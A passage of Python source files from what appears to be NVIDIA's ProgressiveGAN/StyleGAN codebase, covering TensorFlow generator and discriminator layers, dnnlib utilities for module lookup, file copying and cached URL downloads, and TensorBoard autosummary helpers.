#---------------------------------------------------------------------------- # Get/create weight tensor for a convolutional or fully-connected layer. def get_weight(shape, gain=np.sqrt(2), use_wscale=False): fan_in = np.prod(shape[:-1]) # [kernel, kernel, fmaps_in, fmaps_out] or [in, out] std = gain / np.sqrt(fan_in) # He init if use_wscale: wscale = tf.constant(np.float32(std), name='wscale') w = tf.get_variable('weight', shape=shape, initializer=tf.initializers.random_normal()) * wscale else: w = tf.get_variable('weight', shape=shape, initializer=tf.initializers.random_normal(0, std)) return w #---------------------------------------------------------------------------- # Fully-connected layer. def dense(x, fmaps, gain=np.sqrt(2), use_wscale=False): if len(x.shape) > 2: x = tf.reshape(x, [-1, np.prod([d.value for d in x.shape[1:]])]) w = get_weight([x.shape[1].value, fmaps], gain=gain, use_wscale=use_wscale) w = tf.cast(w, x.dtype) return tf.matmul(x, w) #---------------------------------------------------------------------------- # Convolutional layer. def conv2d(x, fmaps, kernel, gain=np.sqrt(2), use_wscale=False): assert kernel >= 1 and kernel % 2 == 1 w = get_weight([kernel, kernel, x.shape[1].value, fmaps], gain=gain, use_wscale=use_wscale) w = tf.cast(w, x.dtype) return tf.nn.conv2d(x, w, strides=[1,1,1,1], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Apply bias to the given activation tensor. def apply_bias(x): b = tf.get_variable('bias', shape=[x.shape[1]], initializer=tf.initializers.zeros()) b = tf.cast(b, x.dtype) if len(x.shape) == 2: return x + b return x + tf.reshape(b, [1, -1, 1, 1]) #---------------------------------------------------------------------------- # Leaky ReLU activation. Same as tf.nn.leaky_relu, but supports FP16. def leaky_relu(x, alpha=0.2): with tf.name_scope('LeakyRelu'): alpha = tf.constant(alpha, dtype=x.dtype, name='alpha') return tf.maximum(x * alpha, x) #---------------------------------------------------------------------------- # Nearest-neighbor upscaling layer. def upscale2d(x, factor=2): assert isinstance(factor, int) and factor >= 1 if factor == 1: return x with tf.variable_scope('Upscale2D'): s = x.shape x = tf.reshape(x, [-1, s[1], s[2], 1, s[3], 1]) x = tf.tile(x, [1, 1, 1, factor, 1, factor]) x = tf.reshape(x, [-1, s[1], s[2] * factor, s[3] * factor]) return x #---------------------------------------------------------------------------- # Fused upscale2d + conv2d. # Faster and uses less memory than performing the operations separately. def upscale2d_conv2d(x, fmaps, kernel, gain=np.sqrt(2), use_wscale=False): assert kernel >= 1 and kernel % 2 == 1 w = get_weight([kernel, kernel, x.shape[1].value, fmaps], gain=gain, use_wscale=use_wscale) w = tf.transpose(w, [0, 1, 3, 2]) # [kernel, kernel, fmaps_out, fmaps_in] w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT') w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) w = tf.cast(w, x.dtype) os = [tf.shape(x)[0], fmaps, x.shape[2] * 2, x.shape[3] * 2] return tf.nn.conv2d_transpose(x, w, os, strides=[1,1,2,2], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Box filter downscaling layer. def downscale2d(x, factor=2): assert isinstance(factor, int) and factor >= 1 if factor == 1: return x with tf.variable_scope('Downscale2D'): ksize = [1, 1, factor, factor] return tf.nn.avg_pool(x, ksize=ksize, strides=ksize, padding='VALID', data_format='NCHW') # NOTE: requires tf_config['graph_options.place_pruned_graph'] = True #---------------------------------------------------------------------------- # Fused conv2d + downscale2d. # Faster and uses less memory than performing the operations separately. def conv2d_downscale2d(x, fmaps, kernel, gain=np.sqrt(2), use_wscale=False): assert kernel >= 1 and kernel % 2 == 1 w = get_weight([kernel, kernel, x.shape[1].value, fmaps], gain=gain, use_wscale=use_wscale) w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT') w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) * 0.25 w = tf.cast(w, x.dtype) return tf.nn.conv2d(x, w, strides=[1,1,2,2], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Pixelwise feature vector normalization. def pixel_norm(x, epsilon=1e-8): with tf.variable_scope('PixelNorm'): return x * tf.rsqrt(tf.reduce_mean(tf.square(x), axis=1, keepdims=True) + epsilon) #---------------------------------------------------------------------------- # Minibatch standard deviation. def minibatch_stddev_layer(x, group_size=4, num_new_features=1): with tf.variable_scope('MinibatchStddev'): group_size = tf.minimum(group_size, tf.shape(x)[0]) # Minibatch must be divisible by (or smaller than) group_size. s = x.shape # [NCHW] Input shape. y = tf.reshape(x, [group_size, -1, num_new_features, s[1]//num_new_features, s[2], s[3]]) # [GMncHW] Split minibatch into M groups of size G. Split channels into n channel groups c. y = tf.cast(y, tf.float32) # [GMncHW] Cast to FP32. y -= tf.reduce_mean(y, axis=0, keepdims=True) # [GMncHW] Subtract mean over group. y = tf.reduce_mean(tf.square(y), axis=0) # [MncHW] Calc variance over group. y = tf.sqrt(y + 1e-8) # [MncHW] Calc stddev over group. y = tf.reduce_mean(y, axis=[2,3,4], keepdims=True) # [Mn111] Take average over fmaps and pixels. y = tf.reduce_mean(y, axis=[2]) # [Mn11] Split channels into c channel groups y = tf.cast(y, x.dtype) # [Mn11] Cast back to original data type. y = tf.tile(y, [group_size, 1, s[2], s[3]]) # [NnHW] Replicate over group and pixels. return tf.concat([x, y], axis=1) # [NCHW] Append as new fmap. #---------------------------------------------------------------------------- # Networks used in the ProgressiveGAN paper. def G_paper( latents_in, # First input: Latent vectors [minibatch, latent_size]. labels_in, # Second input: Labels [minibatch, label_size]. num_channels = 1, # Number of output color channels. Overridden based on dataset. resolution = 32, # Output resolution. Overridden based on dataset. label_size = 0, # Dimensionality of the labels, 0 if no labels. Overridden based on dataset. fmap_base = 8192, # Overall multiplier for the number of feature maps. fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution. fmap_max = 512, # Maximum number of feature maps in any layer. latent_size = None, # Dimensionality of the latent vectors. None = min(fmap_base, fmap_max). normalize_latents = True, # Normalize latent vectors before feeding them to the network? use_wscale = True, # Enable equalized learning rate? use_pixelnorm = True, # Enable pixelwise feature vector normalization? pixelnorm_epsilon = 1e-8, # Constant epsilon for pixelwise feature vector normalization. use_leakyrelu = True, # True = leaky ReLU, False = ReLU. dtype = 'float32', # Data type to use for activations and outputs. fused_scale = True, # True = use fused upscale2d + conv2d, False = separate upscale2d layers. structure = None, # 'linear' = human-readable, 'recursive' = efficient, None = select automatically. is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. **_kwargs): # Ignore unrecognized keyword args. resolution_log2 = int(np.log2(resolution)) assert resolution == 2**resolution_log2 and resolution >= 4 def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max) def PN(x): return pixel_norm(x, epsilon=pixelnorm_epsilon) if use_pixelnorm else x if latent_size is None: latent_size = nf(0) if structure is None: structure = 'linear' if is_template_graph else 'recursive' act = leaky_relu if use_leakyrelu else tf.nn.relu latents_in.set_shape([None, latent_size]) labels_in.set_shape([None, label_size]) combo_in = tf.cast(tf.concat([latents_in, labels_in], axis=1), dtype) lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0.0), trainable=False), dtype) images_out = None # Building blocks. def block(x, res): # res = 2..resolution_log2 with tf.variable_scope('%dx%d' % (2**res, 2**res)): if res == 2: # 4x4 if normalize_latents: x = pixel_norm(x, epsilon=pixelnorm_epsilon) with tf.variable_scope('Dense'): x = dense(x, fmaps=nf(res-1)*16, gain=np.sqrt(2)/4, use_wscale=use_wscale) # override gain to match the original Theano implementation x = tf.reshape(x, [-1, nf(res-1), 4, 4]) x = PN(act(apply_bias(x))) with tf.variable_scope('Conv'): x = PN(act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale)))) else: # 8x8 and up if fused_scale: with tf.variable_scope('Conv0_up'): x = PN(act(apply_bias(upscale2d_conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale)))) else: x = upscale2d(x) with tf.variable_scope('Conv0'): x = PN(act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale)))) with tf.variable_scope('Conv1'): x = PN(act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale)))) return x def torgb(x, res): # res = 2..resolution_log2 lod = resolution_log2 - res with tf.variable_scope('ToRGB_lod%d' % lod): return apply_bias(conv2d(x, fmaps=num_channels, kernel=1, gain=1, use_wscale=use_wscale)) # Linear structure: simple but inefficient. if structure == 'linear': x = block(combo_in, 2) images_out = torgb(x, 2) for res in range(3, resolution_log2 + 1): lod = resolution_log2 - res x = block(x, res) img = torgb(x, res) images_out = upscale2d(images_out) with tf.variable_scope('Grow_lod%d' % lod): images_out = lerp_clip(img, images_out, lod_in - lod) # Recursive structure: complex but efficient. if structure == 'recursive': def grow(x, res, lod): y = block(x, res) img = lambda: upscale2d(torgb(y, res), 2**lod) if res > 2: img = cset(img, (lod_in > lod), lambda: upscale2d(lerp(torgb(y, res), upscale2d(torgb(x, res - 1)), lod_in - lod), 2**lod)) if lod > 0: img = cset(img, (lod_in < lod), lambda: grow(y, res + 1, lod - 1)) return img() images_out = grow(combo_in, 2, resolution_log2 - 2) assert images_out.dtype == tf.as_dtype(dtype) images_out = tf.identity(images_out, name='images_out') return images_out def D_paper( images_in, # First input: Images [minibatch, channel, height, width]. labels_in, # Second input: Labels [minibatch, label_size]. num_channels = 1, # Number of input color channels. Overridden based on dataset. resolution = 32, # Input resolution. Overridden based on dataset. label_size = 0, # Dimensionality of the labels, 0 if no labels. Overridden based on dataset. fmap_base = 8192, # Overall multiplier for the number of feature maps. fmap_decay = 1.0, # log2 feature map reduction when doubling the resolution. fmap_max = 512, # Maximum number of feature maps in any layer. use_wscale = True, # Enable equalized learning rate? mbstd_group_size = 4, # Group size for the minibatch standard deviation layer, 0 = disable. dtype = 'float32', # Data type to use for activations and outputs. fused_scale = True, # True = use fused conv2d + downscale2d, False = separate downscale2d layers. structure = None, # 'linear' = human-readable, 'recursive' = efficient, None = select automatically is_template_graph = False, # True = template graph constructed by the Network class, False = actual evaluation. **_kwargs): # Ignore unrecognized keyword args. resolution_log2 = int(np.log2(resolution)) assert resolution == 2**resolution_log2 and resolution >= 4 def nf(stage): return min(int(fmap_base / (2.0 ** (stage * fmap_decay))), fmap_max) if structure is None: structure = 'linear' if is_template_graph else 'recursive' act = leaky_relu images_in.set_shape([None, num_channels, resolution, resolution]) labels_in.set_shape([None, label_size]) images_in = tf.cast(images_in, dtype) labels_in = tf.cast(labels_in, dtype) lod_in = tf.cast(tf.get_variable('lod', initializer=np.float32(0.0), trainable=False), dtype) scores_out = None # Building blocks. def fromrgb(x, res): # res = 2..resolution_log2 with tf.variable_scope('FromRGB_lod%d' % (resolution_log2 - res)): return act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=1, use_wscale=use_wscale))) def block(x, res): # res = 2..resolution_log2 with tf.variable_scope('%dx%d' % (2**res, 2**res)): if res >= 3: # 8x8 and up with tf.variable_scope('Conv0'): x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale))) if fused_scale: with tf.variable_scope('Conv1_down'): x = act(apply_bias(conv2d_downscale2d(x, fmaps=nf(res-2), kernel=3, use_wscale=use_wscale))) else: with tf.variable_scope('Conv1'): x = act(apply_bias(conv2d(x, fmaps=nf(res-2), kernel=3, use_wscale=use_wscale))) x = downscale2d(x) else: # 4x4 if mbstd_group_size > 1: x = minibatch_stddev_layer(x, mbstd_group_size) with tf.variable_scope('Conv'): x = act(apply_bias(conv2d(x, fmaps=nf(res-1), kernel=3, use_wscale=use_wscale))) with tf.variable_scope('Dense0'): x = act(apply_bias(dense(x, fmaps=nf(res-2), use_wscale=use_wscale))) with tf.variable_scope('Dense1'): x = apply_bias(dense(x, fmaps=1, gain=1, use_wscale=use_wscale)) return x # Linear structure: simple but inefficient. if structure == 'linear': img = images_in x = fromrgb(img, resolution_log2) for res in range(resolution_log2, 2, -1): lod = resolution_log2 - res x = block(x, res) img = downscale2d(img) y = fromrgb(img, res - 1) with tf.variable_scope('Grow_lod%d' % lod): x = lerp_clip(x, y, lod_in - lod) scores_out = block(x, 2) # Recursive structure: complex but efficient. if structure == 'recursive': def grow(res, lod): x = lambda: fromrgb(downscale2d(images_in, 2**lod), res) if lod > 0: x = cset(x, (lod_in < lod), lambda: grow(res + 1, lod - 1)) x = block(x(), res); y = lambda: x if res > 2: y = cset(y, (lod_in > lod), lambda: lerp(x, fromrgb(downscale2d(images_in, 2**(lod+1)), res - 1), lod_in - lod)) return y() scores_out = grow(2, resolution_log2 - 2) assert scores_out.dtype == tf.as_dtype(dtype) scores_out = tf.identity(scores_out, name='scores_out') return scores_out #---------------------------------------------------------------------------- File: dnnlib/util.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Miscellaneous utility classes and functions.""" import ctypes import fnmatch import importlib import inspect import numpy as np import os import shutil import sys import types import io import pickle import re import requests import html import hashlib import glob import uuid from distutils.util import strtobool from typing import Any, List, Tuple, Union # Util classes # ------------------------------------------------------------------------------------------ class EasyDict(dict): """Convenience class that behaves like a dict but allows access with the attribute syntax.""" def __getattr__(self, name: str) -> Any: try: return self[name] except KeyError: raise AttributeError(name) def __setattr__(self, name: str, value: Any) -> None: self[name] = value def __delattr__(self, name: str) -> None: del self[name] class Logger(object): """Redirect stderr to stdout, optionally print stdout to a file, and optionally force flushing on both stdout and the file.""" def __init__(self, file_name: str = None, file_mode: str = "w", should_flush: bool = True): self.file = None if file_name is not None: self.file = open(file_name, file_mode) self.should_flush = should_flush self.stdout = sys.stdout self.stderr = sys.stderr sys.stdout = self sys.stderr = self def __enter__(self) -> "Logger": return self def __exit__(self, exc_type: Any, exc_value: Any, traceback: Any) -> None: self.close() def write(self, text: str) -> None: """Write text to stdout (and a file) and optionally flush.""" if len(text) == 0: # workaround for a bug in VSCode debugger: sys.stdout.write(''); sys.stdout.flush() => crash return if self.file is not None: self.file.write(text) self.stdout.write(text) if self.should_flush: self.flush() def flush(self) -> None: """Flush written text to both stdout and a file, if open.""" if self.file is not None: self.file.flush() self.stdout.flush() def close(self) -> None: """Flush, close possible files, and remove stdout/stderr mirroring.""" self.flush() # if using multiple loggers, prevent closing in wrong order if sys.stdout is self: sys.stdout = self.stdout if sys.stderr is self: sys.stderr = self.stderr if self.file is not None: self.file.close() # Small util functions # ------------------------------------------------------------------------------------------ def format_time(seconds: Union[int, float]) -> str: """Convert the seconds to human readable string with days, hours, minutes and seconds.""" s = int(np.rint(seconds)) if s < 60: return "{0}s".format(s) elif s < 60 * 60: return "{0}m {1:02}s".format(s // 60, s % 60) elif s < 24 * 60 * 60: return "{0}h {1:02}m {2:02}s".format(s // (60 * 60), (s // 60) % 60, s % 60) else: return "{0}d {1:02}h {2:02}m".format(s // (24 * 60 * 60), (s // (60 * 60)) % 24, (s // 60) % 60) def ask_yes_no(question: str) -> bool: """Ask the user the question until the user inputs a valid answer.""" while True: try: print("{0} [y/n]".format(question)) return strtobool(input().lower()) except ValueError: pass def tuple_product(t: Tuple) -> Any: """Calculate the product of the tuple elements.""" result = 1 for v in t: result *= v return result _str_to_ctype = { "uint8": ctypes.c_ubyte, "uint16": ctypes.c_uint16, "uint32": ctypes.c_uint32, "uint64": ctypes.c_uint64, "int8": ctypes.c_byte, "int16": ctypes.c_int16, "int32": ctypes.c_int32, "int64": ctypes.c_int64, "float32": ctypes.c_float, "float64": ctypes.c_double } def get_dtype_and_ctype(type_obj: Any) -> Tuple[np.dtype, Any]: """Given a type name string (or an object having a __name__ attribute), return matching Numpy and ctypes types that have the same size in bytes.""" type_str = None if isinstance(type_obj, str): type_str = type_obj elif hasattr(type_obj, "__name__"): type_str = type_obj.__name__ elif hasattr(type_obj, "name"): type_str = type_obj.name else: raise RuntimeError("Cannot infer type name from input") assert type_str in _str_to_ctype.keys() my_dtype = np.dtype(type_str) my_ctype = _str_to_ctype[type_str] assert my_dtype.itemsize == ctypes.sizeof(my_ctype) return my_dtype, my_ctype def is_pickleable(obj: Any) -> bool: try: with io.BytesIO() as stream: pickle.dump(obj, stream) return True except: return False # Functionality to import modules/objects by name, and call functions by name # ------------------------------------------------------------------------------------------ def get_module_from_obj_name(obj_name: str) -> Tuple[types.ModuleType, str]: """Searches for the underlying module behind the name to some python object. Returns the module and the object name (original name with module part removed).""" # allow convenience shorthands, substitute them by full names obj_name = re.sub("^np.", "numpy.", obj_name) obj_name = re.sub("^tf.", "tensorflow.", obj_name) # list alternatives for (module_name, local_obj_name) parts = obj_name.split(".") name_pairs = [(".".join(parts[:i]), ".".join(parts[i:])) for i in range(len(parts), 0, -1)] # try each alternative in turn for module_name, local_obj_name in name_pairs: try: module = importlib.import_module(module_name) # may raise ImportError get_obj_from_module(module, local_obj_name) # may raise AttributeError return module, local_obj_name except: pass # maybe some of the modules themselves contain errors? for module_name, _local_obj_name in name_pairs: try: importlib.import_module(module_name) # may raise ImportError except ImportError: if not str(sys.exc_info()[1]).startswith("No module named '" + module_name + "'"): raise # maybe the requested attribute is missing? for module_name, local_obj_name in name_pairs: try: module = importlib.import_module(module_name) # may raise ImportError get_obj_from_module(module, local_obj_name) # may raise AttributeError except ImportError: pass # we are out of luck, but we have no idea why raise ImportError(obj_name) def get_obj_from_module(module: types.ModuleType, obj_name: str) -> Any: """Traverses the object name and returns the last (rightmost) python object.""" if obj_name == '': return module obj = module for part in obj_name.split("."): obj = getattr(obj, part) return obj def get_obj_by_name(name: str) -> Any: """Finds the python object with the given name.""" module, obj_name = get_module_from_obj_name(name) return get_obj_from_module(module, obj_name) def call_func_by_name(*args, func_name: str = None, **kwargs) -> Any: """Finds the python object with the given name and calls it as a function.""" assert func_name is not None func_obj = get_obj_by_name(func_name) assert callable(func_obj) return func_obj(*args, **kwargs) def get_module_dir_by_obj_name(obj_name: str) -> str: """Get the directory path of the module containing the given object name.""" module, _ = get_module_from_obj_name(obj_name) return os.path.dirname(inspect.getfile(module)) def is_top_level_function(obj: Any) -> bool: """Determine whether the given object is a top-level function, i.e., defined at module scope using 'def'.""" return callable(obj) and obj.__name__ in sys.modules[obj.__module__].__dict__ def get_top_level_function_name(obj: Any) -> str: """Return the fully-qualified name of a top-level function.""" assert is_top_level_function(obj) return obj.__module__ + "." + obj.__name__ # File system helpers # ------------------------------------------------------------------------------------------ def list_dir_recursively_with_ignore(dir_path: str, ignores: List[str] = None, add_base_to_relative: bool = False) -> List[Tuple[str, str]]: """List all files recursively in a given directory while ignoring given file and directory names. Returns list of tuples containing both absolute and relative paths.""" assert os.path.isdir(dir_path) base_name = os.path.basename(os.path.normpath(dir_path)) if ignores is None: ignores = [] result = [] for root, dirs, files in os.walk(dir_path, topdown=True): for ignore_ in ignores: dirs_to_remove = [d for d in dirs if fnmatch.fnmatch(d, ignore_)] # dirs need to be edited in-place for d in dirs_to_remove: dirs.remove(d) files = [f for f in files if not fnmatch.fnmatch(f, ignore_)] absolute_paths = [os.path.join(root, f) for f in files] relative_paths = [os.path.relpath(p, dir_path) for p in absolute_paths] if add_base_to_relative: relative_paths = [os.path.join(base_name, p) for p in relative_paths] assert len(absolute_paths) == len(relative_paths) result += zip(absolute_paths, relative_paths) return result def copy_files_and_create_dirs(files: List[Tuple[str, str]]) -> None: """Takes in a list of tuples of (src, dst) paths and copies files. Will create all necessary directories.""" for file in files: target_dir_name = os.path.dirname(file[1]) # will create all intermediate-level directories if not os.path.exists(target_dir_name): os.makedirs(target_dir_name) shutil.copyfile(file[0], file[1]) # URL helpers # ------------------------------------------------------------------------------------------ def is_url(obj: Any) -> bool: """Determine whether the given object is a valid URL string.""" if not isinstance(obj, str) or not "://" in obj: return False try: res = requests.compat.urlparse(obj) if not res.scheme or not res.netloc or not "." in res.netloc: return False res = requests.compat.urlparse(requests.compat.urljoin(obj, "/")) if not res.scheme or not res.netloc or not "." in res.netloc: return False except: return False return True def open_url(url: str, cache_dir: str = None, num_attempts: int = 10, verbose: bool = True) -> Any: """Download the given URL and return a binary-mode file object to access the data.""" assert is_url(url) assert num_attempts >= 1 # Lookup from cache. url_md5 = hashlib.md5(url.encode("utf-8")).hexdigest() if cache_dir is not None: cache_files = glob.glob(os.path.join(cache_dir, url_md5 + "_*")) if len(cache_files) == 1: return open(cache_files[0], "rb") # Download. url_name = None url_data = None with requests.Session() as session: if verbose: print("Downloading %s ..." % url, end="", flush=True) for attempts_left in reversed(range(num_attempts)): try: with session.get(url) as res: res.raise_for_status() if len(res.content) == 0: raise IOError("No data received") if len(res.content) < 8192: content_str = res.content.decode("utf-8") if "download_warning" in res.headers.get("Set-Cookie", ""): links = [html.unescape(link) for link in content_str.split('"') if "export=download" in link] if len(links) == 1: url = requests.compat.urljoin(url, links[0]) raise IOError("Google Drive virus checker nag") if "Google Drive - Quota exceeded" in content_str: raise IOError("Google Drive quota exceeded") match = re.search(r'filename="([^"]*)"', res.headers.get("Content-Disposition", "")) url_name = match[1] if match else url url_data = res.content if verbose: print(" done") break except: if not attempts_left: if verbose: print(" failed") raise if verbose: print(".", end="", flush=True) # Save to cache. if cache_dir is not None: safe_name = re.sub(r"[^0-9a-zA-Z-._]", "_", url_name) cache_file = os.path.join(cache_dir, url_md5 + "_" + safe_name) temp_file = os.path.join(cache_dir, "tmp_" + uuid.uuid4().hex + "_" + url_md5 + "_" + safe_name) os.makedirs(cache_dir, exist_ok=True) with open(temp_file, "wb") as f: f.write(url_data) os.replace(temp_file, cache_file) # atomic # Return data as file object. return io.BytesIO(url_data) File: dnnlib/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. from . import submission from .submission.run_context import RunContext from .submission.submit import SubmitTarget from .submission.submit import PathType from .submission.submit import SubmitConfig from .submission.submit import get_path_from_template from .submission.submit import submit_run from .util import EasyDict submit_config: SubmitConfig = None # Package level variable for SubmitConfig which is only valid when inside the run function. File: dnnlib/tflib/__init__.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. from . import autosummary from . import network from . import optimizer from . import tfutil from .tfutil import * from .network import Network from .optimizer import Optimizer File: dnnlib/tflib/autosummary.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Helper for adding automatically tracked values to Tensorboard. Autosummary creates an identity op that internally keeps track of the input values and automatically shows up in TensorBoard. The reported value represents an average over input components. The average is accumulated constantly over time and flushed when save_summaries() is called. Notes: - The output tensor must be used as an input for something else in the graph. Otherwise, the autosummary op will not get executed, and the average value will not get accumulated. - It is perfectly fine to include autosummaries with the same name in several places throughout the graph, even if they are executed concurrently. - It is ok to also pass in a python scalar or numpy array. In this case, it is added to the average immediately. """ from collections import OrderedDict import numpy as np import tensorflow as tf from tensorboard import summary as summary_lib from tensorboard.plugins.custom_scalar import layout_pb2 from . import tfutil from .tfutil import TfExpression from .tfutil import TfExpressionEx _dtype = tf.float64 _vars = OrderedDict() # name => [var, ...] _immediate = OrderedDict() # name => update_op, update_value _finalized = False _merge_op = None def _create_var(name: str, value_expr: TfExpression) -> TfExpression: """Internal helper for creating autosummary accumulators.""" assert not _finalized name_id = name.replace("/", "_") v = tf.cast(value_expr, _dtype) if v.shape.is_fully_defined(): size = np.prod(tfutil.shape_to_list(v.shape)) size_expr = tf.constant(size, dtype=_dtype) else: size = None size_expr = tf.reduce_prod(tf.cast(tf.shape(v), _dtype)) if size == 1: if v.shape.ndims != 0: v = tf.reshape(v, []) v = [size_expr, v, tf.square(v)] else: v = [size_expr, tf.reduce_sum(v), tf.reduce_sum(tf.square(v))] v = tf.cond(tf.is_finite(v[1]), lambda: tf.stack(v), lambda: tf.zeros(3, dtype=_dtype)) with tfutil.absolute_name_scope("Autosummary/" + name_id), tf.control_dependencies(None): var = tf.Variable(tf.zeros(3, dtype=_dtype), trainable=False) # [sum(1), sum(x), sum(x**2)] update_op = tf.cond(tf.is_variable_initialized(var), lambda: tf.assign_add(var, v), lambda: tf.assign(var, v)) if name in _vars: _vars[name].append(var) else: _vars[name] = [var] return update_op def autosummary(name: str, value: TfExpressionEx, passthru: TfExpressionEx = None) -> TfExpressionEx: """Create a new autosummary. Args: name: Name to use in TensorBoard value: TensorFlow expression or python value to track passthru: Optionally return this TF node without modifications but tack an autosummary update side-effect to this node. Example use of the passthru mechanism: n = autosummary('l2loss', loss, passthru=n) This is a shorthand for the following code: with tf.control_dependencies([autosummary('l2loss', loss)]): n = tf.identity(n) """ tfutil.assert_tf_initialized() name_id = name.replace("/", "_") if tfutil.is_tf_expression(value): with tf.name_scope("summary_" + name_id), tf.device(value.device): update_op = _create_var(name, value) with tf.control_dependencies([update_op]): return tf.identity(value if passthru is None else passthru) else: # python scalar or numpy array if name not in _immediate: with tfutil.absolute_name_scope("Autosummary/" + name_id), tf.device(None), tf.control_dependencies(None): update_value = tf.placeholder(_dtype) update_op = _create_var(name, update_value) _immediate[name] = update_op, update_value update_op, update_value = _immediate[name] tfutil.run(update_op, {update_value: value}) return value if passthru is None else passthru def finalize_autosummaries() -> None: """Create the necessary ops to include autosummaries in TensorBoard report. Note: This should be done only once per graph. """ global _finalized tfutil.assert_tf_initialized() if _finalized: return None _finalized = True tfutil.init_uninitialized_vars([var for vars_list in _vars.values() for var in vars_list]) # Create summary ops. with tf.device(None), tf.control_dependencies(None): for name, vars_list in _vars.items(): name_id = name.replace("/", "_") with tfutil.absolute_name_scope("Autosummary/" + name_id): moments = tf.add_n(vars_list) moments /= moments[0] with tf.control_dependencies([moments]): # read before resetting reset_ops = [tf.assign(var, tf.zeros(3, dtype=_dtype)) for var in vars_list] with tf.name_scope(None), tf.control_dependencies(reset_ops): # reset before reporting mean = moments[1] std = tf.sqrt(moments[2] - tf.square(moments[1])) tf.summary.scalar(name, mean) tf.summary.scalar("xCustomScalars/" + name + "/margin_lo", mean - std) tf.summary.scalar("xCustomScalars/" + name + "/margin_hi", mean + std) # Group by category and chart name. cat_dict = OrderedDict() for series_name in sorted(_vars.keys()): p = series_name.split("/") cat = p[0] if len(p) >= 2 else "" chart = "/".join(p[1:-1]) if len(p) >= 3 else p[-1] if cat not in cat_dict: cat_dict[cat] = OrderedDict() if chart not in cat_dict[cat]: cat_dict[cat][chart] = [] cat_dict[cat][chart].append(series_name) # Setup custom_scalar layout. categories = [] for cat_name, chart_dict in cat_dict.items(): charts = [] for chart_name, series_names in chart_dict.items(): series = [] for series_name in series_names: series.append(layout_pb2.MarginChartContent.Series( value=series_name, lower="xCustomScalars/" + series_name + "/margin_lo", upper="xCustomScalars/" + series_name + "/margin_hi")) margin = layout_pb2.MarginChartContent(series=series) charts.append(layout_pb2.Chart(title=chart_name, margin=margin)) categories.append(layout_pb2.Category(title=cat_name, chart=charts)) layout = summary_lib.custom_scalar_pb(layout_pb2.Layout(category=categories)) return layout def save_summaries(file_writer, global_step=None): """Call FileWriter.add_summary() with all summaries in the default graph, automatically finalizing and merging them on the first call. """ global _merge_op tfutil.assert_tf_initialized() if _merge_op is None: layout = finalize_autosummaries() if layout is not None: file_writer.add_summary(layout) with tf.device(None), tf.control_dependencies(None): _merge_op = tf.summary.merge_all() file_writer.add_summary(_merge_op.eval(), global_step) File: dnnlib/tflib/tfutil.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Miscellaneous helper utils for Tensorflow.""" import os import numpy as np import tensorflow as tf from typing import Any, Iterable, List, Union TfExpression = Union[tf.Tensor, tf.Variable, tf.Operation] """A type that represents a valid Tensorflow expression.""" TfExpressionEx = Union[TfExpression, int, float, np.ndarray] """A type that can be converted to a valid Tensorflow expression.""" def run(*args, **kwargs) -> Any: """Run the specified ops in the default session.""" assert_tf_initialized() return tf.get_default_session().run(*args, **kwargs) def is_tf_expression(x: Any) -> bool: """Check whether the input is a valid Tensorflow expression, i.e., Tensorflow Tensor, Variable, or Operation.""" return isinstance(x, (tf.Tensor, tf.Variable, tf.Operation)) def shape_to_list(shape: Iterable[tf.Dimension]) -> List[Union[int, None]]: """Convert a Tensorflow shape to a list of ints.""" return [dim.value for dim in shape] def flatten(x: TfExpressionEx) -> TfExpression: """Shortcut function for flattening a tensor.""" with tf.name_scope("Flatten"): return tf.reshape(x, [-1]) def log2(x: TfExpressionEx) -> TfExpression: """Logarithm in base 2.""" with tf.name_scope("Log2"): return tf.log(x) * np.float32(1.0 / np.log(2.0)) def exp2(x: TfExpressionEx) -> TfExpression: """Exponent in base 2.""" with tf.name_scope("Exp2"): return tf.exp(x * np.float32(np.log(2.0))) def lerp(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpressionEx: """Linear interpolation.""" with tf.name_scope("Lerp"): return a + (b - a) * t def lerp_clip(a: TfExpressionEx, b: TfExpressionEx, t: TfExpressionEx) -> TfExpression: """Linear interpolation 